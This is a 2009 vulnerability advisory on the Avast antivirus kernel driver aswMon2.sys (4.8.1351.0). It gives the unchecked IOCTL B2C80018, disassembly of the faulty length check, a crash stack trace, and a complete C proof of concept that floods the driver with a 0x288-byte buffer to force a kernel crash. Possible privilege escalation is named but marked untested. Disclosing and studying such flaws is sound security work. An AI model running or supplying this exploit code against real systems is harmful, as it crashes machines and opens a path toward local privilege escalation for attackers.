Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation.

---------------------------------------------------
Advisory: Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation.

Version Affected: Product: Avast antivirus 4.8.1351.0 (other versions could be affected)
Affected Component: aswMon2.sys 4.8.1351.0
Category: Local Denial of Service due to kernel memory corruption (BSOD)
     (untested) Local Privilege Escalation

Discover Date: Sep 13, 2009 PoC Code: Sep 13, 2009
Vendor Notify: Sep 15,2009 Vendor Reply: Sep 15, 2009

Description:
Avast's aswMon2.sys Driver does not sanitize user supplied input IOCTL) and this lead to a kernel memory corruption that propagates on the system with a BSOD and potential risk of Privilege Escalation.

00010F70 cmp [ebp+arg_C], 288h ;InBuff Len no other checks performed
00010F77 jnz loc_111AC
00010F7D mov esi, [ebp+SourceString]
00010F80 cmp [esi], ebx
00010F82 mov [ebp+arg_C], ebx

[Scroll down for more details...]

Credit:
Giuseppe 'Evilcry' Bonfa' (Project Manager, www.EvilFingers.com)
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org, http://evilcodecave.blogspot.com
http://evilcodecave.wordpress.com

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
---------------------------------------------------

Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption - Details

00010F70 cmp [ebp+arg_C], 288h ;InBuff Len no other checks performed
00010F77 jnz loc_111AC
00010F7D mov esi, [ebp+SourceString]
00010F80 cmp [esi], ebx
00010F82 mov [ebp+arg_C], ebx

Affected IOCTL is B2C80018

UNEXPECTED_KERNEL_MODE_TRAP_M (1000007f)

Transfer Type: METHOD_BUFFERED

STACK_TEXT:

WARNING: Stack unwind information not available. Following frames may be wrong.
f76f3234 8053d251 f76f3250 00000000 f76f32a4 nt+0x600fa
f76f32a4 8052c712 badb0d00 20a0a0a1 f76f5658 nt+0x66251
f76f3328 8052c793 41414141 00000000 f76f377c nt+0x55712
f76f33a4 804fc700 f76f377c f76f3478 05050505 nt+0x55793

.. f76f56d8 f7756a04 badb0d00 8055b256 00000000 nt+0x66251
f76f576c 41414141 41414141 41414141 41414141 aswMon2+0xa04
f76f5770 41414141 41414141 41414141 41414141 0x41414141
f76f5774 41414141 41414141 41414141 41414141 0x41414141
f76f5778 41414141 41414141 41414141 41414141 0x41414141
f76f577c 41414141 41414141 41414141 41414141 0x41414141
f76f5780 41414141 41414141 41414141 41414141 0x41414141
..

Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption - PoC

#define WIN32_LEAN_AND_MEAN
#include < windows.h>
#include < stdio.h>
BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab
{
WCHAR DeviceName[MAX_PATH]; HANDLE hDevice;
if ((GetVersion() & 0xFF) >= 5) {
wcscpy(DeviceName, L"\\\\.\\Global\\");
} else {
wcscpy(DeviceName, L"\\\\.\\"); }
wcscat(DeviceName, DriverName); printf("Opening.. %S\n", DeviceName);
hDevice = CreateFileW(DeviceName, GENERIC_READ |
GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

if (hDevice == INVALID_HANDLE_VALUE) {
printf("CreateFile() ERROR %d\n", GetLastError()); return FALSE;
}
*lphDevice = hDevice; return TRUE;
}

int main() {
HANDLE hDev = NULL; DWORD Junk;
if(!OpenDevice(L"aswMon",&hDev)) {
printf("Unable to access aswMon"); return(0);
}

char *Buff = (char *)VirtualAlloc(NULL, 0x288, MEM_RESERVE |
MEM_COMMIT, PAGE_EXECUTE_READWRITE);

if (Buff)
{
memset(Buff, 'A', 0x288);
DeviceIoControl(hDev,0xB2C80018,Buff, 0x288,Buff,0x288,&Junk,(LPOVERLAPPED)NULL);
printf("DeviceIoControl Executed..\n");
}
else { printf("VirtualAlloc() ERROR %d\n", GetLastError()); }
return(0); }